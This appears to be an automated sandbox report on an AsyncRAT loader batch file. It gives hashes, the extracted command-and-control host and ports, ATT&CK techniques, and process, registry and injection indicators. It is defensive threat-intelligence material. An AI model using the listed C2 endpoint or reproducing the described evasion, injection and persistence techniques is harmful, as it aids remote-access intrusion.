asyncrat | 52aac553901b56007d9b40870447423fef70802593722eebd3a7326635074aaa

Analysis

max time kernel
149s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
26-05-2024 14:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4x loader.bat
Size

1.5MB
MD5

5b956910d7d28f6ee2ccb59d4c7b402f
SHA1

e99a814ba0a8824a2bb1625b4e2cb0aa828d26e1
SHA256

52aac553901b56007d9b40870447423fef70802593722eebd3a7326635074aaa
SHA512

1967ce3eb6344695012c1ebb3c78a2a86396c900783907b7f383bb60a40e622ce52af6b813d3cf17686edae560da6d61462fb1d5f7446114ab9a1c9e61e3f635
SSDEEP

24576:f69MXQh3D4FnZFRiMf4lPGj8rDm2Wum/j2EtY5ZYZu9C0AzBVG3e5Ql2jumGP:fwTSh3QG+Y9tNjQ

Score

10^/10

asyncrat default execution rat

Malware Config

Extracted

Family

asyncrat

Version

1.0.7

Botnet

Default

bit-keeping.gl.at.ply.gg:4444

bit-keeping.gl.at.ply.gg:49417

Mutex

DcRatMutex_qwqdanchun

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Blocklisted process makes network request 4 IoCs

Processes:

powershell.exe

flow pid process

29 600 powershell.exe
31 600 powershell.exe
34 600 powershell.exe
36 600 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid process

1392 powershell.exe
600 powershell.exe
2396 powershell.exe
5080 powershell.exe
2784 powershell.exe
4784 powershell.exe
2144 powershell.exe
Drops file in Drivers directory 1 IoCs

Processes:

powershell.exe

description ioc process

File opened for modification C:\Windows\System32\drivers\etc\hosts powershell.exe

flow	pid	process
29	600	powershell.exe
31	600	powershell.exe
34	600	powershell.exe
36	600	powershell.exe

pid	process
1392	powershell.exe
600	powershell.exe
2396	powershell.exe
5080	powershell.exe
2784	powershell.exe
4784	powershell.exe
2144	powershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exeWScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation	WScript.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

36 discord.com
35 discord.com
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

30 ip-api.com

flow	ioc
36	discord.com
35	discord.com

flow	ioc
30	ip-api.com

Drops file in System32 directory 15 IoCs

Processes:

svchost.exesvchost.exesvchost.exesvchost.exe

description	ioc	process
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\$phantom-RuntimeBroker_startup_741_str	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File opened for modification	C:\Windows\system32\SleepStudy\user-not-present-trace-2024-05-26-14-40-07.etl	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File created	C:\Windows\system32\SleepStudy\user-not-present-trace-2024-05-26-14-40-07.etl	svchost.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 2784 set thread context of 1368 2784 powershell.exe RegAsm.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

716 1368 WerFault.exe RegAsm.exe

description	pid	process	target process
PID 2784 set thread context of 1368	2784	powershell.exe	RegAsm.exe

pid	pid_target	process	target process
716	1368	WerFault.exe	RegAsm.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

taskmgr.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

svchost.exe

description	ioc	process
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	svchost.exe

Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

wmic.exe

pid process

1936 wmic.exe

pid	process
1936	wmic.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

svchost.exesvchost.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "0018400E3FB4E05F"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe

Modifies registry class 37 IoCs

Processes:

svchost.exepowershell.exepowershell.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1\LU\PCT = "133612080075088413"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\HAM\AUI\App\V1	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133612080523094394"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133612079497434372"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\HAM\AUI	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133612079215871742"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133612079111223067"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\HAM\AUI\App	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI\V1\LU\ICT = "133596484115202720"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133612079819153044"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\HAM\AUI\App\V1\LU	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI\V1\LU	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1\LU	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133612080172744687"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133612080524813206"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133612080538562874"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI\V1	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133612079835403083"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133612079487903244"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133612080516688103"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133612080180869676"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133612080192119587"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI\V1\LU\PCT = "133596484112546451"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133612080154463405"	svchost.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
2396	powershell.exe
2396	powershell.exe
5080	powershell.exe
5080	powershell.exe
2784	powershell.exe
2784	powershell.exe
2784	powershell.exe
2784	powershell.exe
2784	powershell.exe
2784	powershell.exe
2784	powershell.exe
2784	powershell.exe
2784	powershell.exe
2784	powershell.exe
2784	powershell.exe
2784	powershell.exe
2784	powershell.exe
2784	powershell.exe
2784	powershell.exe
2784	powershell.exe
2784	powershell.exe
2784	powershell.exe
2784	powershell.exe
2784	powershell.exe
2784	powershell.exe
2784	powershell.exe
2784	powershell.exe
2784	powershell.exe
2784	powershell.exe
2784	powershell.exe
2784	powershell.exe
2784	powershell.exe
2784	powershell.exe
2784	powershell.exe
2784	powershell.exe
4784	powershell.exe
4784	powershell.exe
4784	powershell.exe
2784	powershell.exe
2784	powershell.exe
2784	powershell.exe
2784	powershell.exe
2784	powershell.exe
2784	powershell.exe
1392	powershell.exe
1392	powershell.exe
1392	powershell.exe
2784	powershell.exe
2784	powershell.exe
2784	powershell.exe
2784	powershell.exe
2784	powershell.exe
2784	powershell.exe
2784	powershell.exe
2784	powershell.exe
2784	powershell.exe
2784	powershell.exe
2784	powershell.exe
2784	powershell.exe
2784	powershell.exe
2784	powershell.exe
2784	powershell.exe
600	powershell.exe
600	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

3384 Explorer.EXE

pid	process
3384	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2396	powershell.exe
Token: SeDebugPrivilege	5080	powershell.exe
Token: SeIncreaseQuotaPrivilege	5080	powershell.exe
Token: SeSecurityPrivilege	5080	powershell.exe
Token: SeTakeOwnershipPrivilege	5080	powershell.exe
Token: SeLoadDriverPrivilege	5080	powershell.exe
Token: SeSystemProfilePrivilege	5080	powershell.exe
Token: SeSystemtimePrivilege	5080	powershell.exe
Token: SeProfSingleProcessPrivilege	5080	powershell.exe
Token: SeIncBasePriorityPrivilege	5080	powershell.exe
Token: SeCreatePagefilePrivilege	5080	powershell.exe
Token: SeBackupPrivilege	5080	powershell.exe
Token: SeRestorePrivilege	5080	powershell.exe
Token: SeShutdownPrivilege	5080	powershell.exe
Token: SeDebugPrivilege	5080	powershell.exe
Token: SeSystemEnvironmentPrivilege	5080	powershell.exe
Token: SeRemoteShutdownPrivilege	5080	powershell.exe
Token: SeUndockPrivilege	5080	powershell.exe
Token: SeManageVolumePrivilege	5080	powershell.exe
Token: 33	5080	powershell.exe
Token: 34	5080	powershell.exe
Token: 35	5080	powershell.exe
Token: 36	5080	powershell.exe
Token: SeIncreaseQuotaPrivilege	5080	powershell.exe
Token: SeSecurityPrivilege	5080	powershell.exe
Token: SeTakeOwnershipPrivilege	5080	powershell.exe
Token: SeLoadDriverPrivilege	5080	powershell.exe
Token: SeSystemProfilePrivilege	5080	powershell.exe
Token: SeSystemtimePrivilege	5080	powershell.exe
Token: SeProfSingleProcessPrivilege	5080	powershell.exe
Token: SeIncBasePriorityPrivilege	5080	powershell.exe
Token: SeCreatePagefilePrivilege	5080	powershell.exe
Token: SeBackupPrivilege	5080	powershell.exe
Token: SeRestorePrivilege	5080	powershell.exe
Token: SeShutdownPrivilege	5080	powershell.exe
Token: SeDebugPrivilege	5080	powershell.exe
Token: SeSystemEnvironmentPrivilege	5080	powershell.exe
Token: SeRemoteShutdownPrivilege	5080	powershell.exe
Token: SeUndockPrivilege	5080	powershell.exe
Token: SeManageVolumePrivilege	5080	powershell.exe
Token: 33	5080	powershell.exe
Token: 34	5080	powershell.exe
Token: 35	5080	powershell.exe
Token: 36	5080	powershell.exe
Token: SeIncreaseQuotaPrivilege	5080	powershell.exe
Token: SeSecurityPrivilege	5080	powershell.exe
Token: SeTakeOwnershipPrivilege	5080	powershell.exe
Token: SeLoadDriverPrivilege	5080	powershell.exe
Token: SeSystemProfilePrivilege	5080	powershell.exe
Token: SeSystemtimePrivilege	5080	powershell.exe
Token: SeProfSingleProcessPrivilege	5080	powershell.exe
Token: SeIncBasePriorityPrivilege	5080	powershell.exe
Token: SeCreatePagefilePrivilege	5080	powershell.exe
Token: SeBackupPrivilege	5080	powershell.exe
Token: SeRestorePrivilege	5080	powershell.exe
Token: SeShutdownPrivilege	5080	powershell.exe
Token: SeDebugPrivilege	5080	powershell.exe
Token: SeSystemEnvironmentPrivilege	5080	powershell.exe
Token: SeRemoteShutdownPrivilege	5080	powershell.exe
Token: SeUndockPrivilege	5080	powershell.exe
Token: SeManageVolumePrivilege	5080	powershell.exe
Token: 33	5080	powershell.exe
Token: 34	5080	powershell.exe
Token: 35	5080	powershell.exe

Suspicious use of FindShellTrayWindow 38 IoCs

Processes:

taskmgr.exeExplorer.EXE

pid	process
3520	taskmgr.exe
3520	taskmgr.exe
3520	taskmgr.exe
3520	taskmgr.exe
3520	taskmgr.exe
3520	taskmgr.exe
3520	taskmgr.exe
3520	taskmgr.exe
3520	taskmgr.exe
3520	taskmgr.exe
3520	taskmgr.exe
3520	taskmgr.exe
3520	taskmgr.exe
3384	Explorer.EXE
3384	Explorer.EXE
3520	taskmgr.exe
3520	taskmgr.exe
3520	taskmgr.exe
3520	taskmgr.exe
3520	taskmgr.exe
3520	taskmgr.exe
3520	taskmgr.exe
3520	taskmgr.exe
3520	taskmgr.exe
3520	taskmgr.exe
3520	taskmgr.exe
3520	taskmgr.exe
3520	taskmgr.exe
3520	taskmgr.exe
3520	taskmgr.exe
3520	taskmgr.exe
3520	taskmgr.exe
3520	taskmgr.exe
3520	taskmgr.exe
3520	taskmgr.exe
3520	taskmgr.exe
3384	Explorer.EXE
3384	Explorer.EXE

Suspicious use of SendNotifyMessage 36 IoCs

Processes:

taskmgr.exeExplorer.EXE

pid	process
3520	taskmgr.exe
3520	taskmgr.exe
3520	taskmgr.exe
3520	taskmgr.exe
3520	taskmgr.exe
3520	taskmgr.exe
3520	taskmgr.exe
3520	taskmgr.exe
3520	taskmgr.exe
3520	taskmgr.exe
3520	taskmgr.exe
3520	taskmgr.exe
3520	taskmgr.exe
3520	taskmgr.exe
3520	taskmgr.exe
3520	taskmgr.exe
3520	taskmgr.exe
3520	taskmgr.exe
3520	taskmgr.exe
3520	taskmgr.exe
3520	taskmgr.exe
3520	taskmgr.exe
3520	taskmgr.exe
3520	taskmgr.exe
3520	taskmgr.exe
3520	taskmgr.exe
3520	taskmgr.exe
3520	taskmgr.exe
3520	taskmgr.exe
3520	taskmgr.exe
3520	taskmgr.exe
3520	taskmgr.exe
3520	taskmgr.exe
3520	taskmgr.exe
3384	Explorer.EXE
3384	Explorer.EXE

Suspicious use of UnmapMainImage 1 IoCs

Processes:

Explorer.EXE

pid process

3384 Explorer.EXE

pid	process
3384	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exenet.exepowershell.exeWScript.execmd.exenet.exepowershell.exe

description	pid	process	target process
PID 4548 wrote to memory of 4456	4548	cmd.exe	net.exe
PID 4548 wrote to memory of 4456	4548	cmd.exe	net.exe
PID 4456 wrote to memory of 1664	4456	net.exe	net1.exe
PID 4456 wrote to memory of 1664	4456	net.exe	net1.exe
PID 4548 wrote to memory of 3588	4548	cmd.exe	cmd.exe
PID 4548 wrote to memory of 3588	4548	cmd.exe	cmd.exe
PID 4548 wrote to memory of 2396	4548	cmd.exe	powershell.exe
PID 4548 wrote to memory of 2396	4548	cmd.exe	powershell.exe
PID 2396 wrote to memory of 5080	2396	powershell.exe	powershell.exe
PID 2396 wrote to memory of 5080	2396	powershell.exe	powershell.exe
PID 2396 wrote to memory of 1368	2396	powershell.exe	WScript.exe
PID 2396 wrote to memory of 1368	2396	powershell.exe	WScript.exe
PID 1368 wrote to memory of 364	1368	WScript.exe	cmd.exe
PID 1368 wrote to memory of 364	1368	WScript.exe	cmd.exe
PID 364 wrote to memory of 1636	364	cmd.exe	net.exe
PID 364 wrote to memory of 1636	364	cmd.exe	net.exe
PID 1636 wrote to memory of 4252	1636	net.exe	net1.exe
PID 1636 wrote to memory of 4252	1636	net.exe	net1.exe
PID 364 wrote to memory of 1648	364	cmd.exe	cmd.exe
PID 364 wrote to memory of 1648	364	cmd.exe	cmd.exe
PID 364 wrote to memory of 2784	364	cmd.exe	powershell.exe
PID 364 wrote to memory of 2784	364	cmd.exe	powershell.exe
PID 2784 wrote to memory of 3384	2784	powershell.exe	Explorer.EXE
PID 2784 wrote to memory of 1964	2784	powershell.exe	svchost.exe
PID 2784 wrote to memory of 3536	2784	powershell.exe	svchost.exe
PID 2784 wrote to memory of 972	2784	powershell.exe	svchost.exe
PID 2784 wrote to memory of 1168	2784	powershell.exe	svchost.exe
PID 2784 wrote to memory of 968	2784	powershell.exe	svchost.exe
PID 2784 wrote to memory of 2732	2784	powershell.exe	svchost.exe
PID 2784 wrote to memory of 388	2784	powershell.exe	svchost.exe
PID 2784 wrote to memory of 1740	2784	powershell.exe	svchost.exe
PID 2784 wrote to memory of 1424	2784	powershell.exe	svchost.exe
PID 2784 wrote to memory of 1732	2784	powershell.exe	svchost.exe
PID 2784 wrote to memory of 2740	2784	powershell.exe	svchost.exe
PID 2784 wrote to memory of 4684	2784	powershell.exe	svchost.exe
PID 2784 wrote to memory of 2116	2784	powershell.exe	svchost.exe
PID 2784 wrote to memory of 1940	2784	powershell.exe	svchost.exe
PID 2784 wrote to memory of 1120	2784	powershell.exe	svchost.exe
PID 2784 wrote to memory of 1316	2784	powershell.exe	svchost.exe
PID 2784 wrote to memory of 920	2784	powershell.exe	svchost.exe
PID 2784 wrote to memory of 524	2784	powershell.exe	svchost.exe
PID 2784 wrote to memory of 1700	2784	powershell.exe	svchost.exe
PID 2784 wrote to memory of 1108	2784	powershell.exe	svchost.exe
PID 2784 wrote to memory of 316	2784	powershell.exe	svchost.exe
PID 2784 wrote to memory of 2272	2784	powershell.exe	svchost.exe
PID 2784 wrote to memory of 2464	2784	powershell.exe	svchost.exe
PID 2784 wrote to memory of 1872	2784	powershell.exe	svchost.exe
PID 2784 wrote to memory of 1280	2784	powershell.exe	svchost.exe
PID 2784 wrote to memory of 5016	2784	powershell.exe	svchost.exe
PID 2784 wrote to memory of 1860	2784	powershell.exe	svchost.exe
PID 2784 wrote to memory of 1268	2784	powershell.exe	svchost.exe
PID 2784 wrote to memory of 2244	2784	powershell.exe	svchost.exe
PID 2784 wrote to memory of 1848	2784	powershell.exe	svchost.exe
PID 2784 wrote to memory of 3616	2784	powershell.exe	svchost.exe
PID 2784 wrote to memory of 2624	2784	powershell.exe	svchost.exe
PID 2784 wrote to memory of 2420	2784	powershell.exe	svchost.exe
PID 2784 wrote to memory of 2024	2784	powershell.exe	svchost.exe
PID 2784 wrote to memory of 1628	2784	powershell.exe	svchost.exe
PID 2784 wrote to memory of 3396	2784	powershell.exe	svchost.exe
PID 2784 wrote to memory of 2408	2784	powershell.exe	svchost.exe
PID 2784 wrote to memory of 2800	2784	powershell.exe	svchost.exe
PID 2784 wrote to memory of 1580	2784	powershell.exe	svchost.exe
PID 2784 wrote to memory of 1812	2784	powershell.exe	svchost.exe
PID 2784 wrote to memory of 1416	2784	powershell.exe	svchost.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p
1⤵
- Drops file in System32 directory
- Modifies registry class
PID:796
- C:\Windows\System32\mousocoreworker.exe
  C:\Windows\System32\mousocoreworker.exe -Embedding
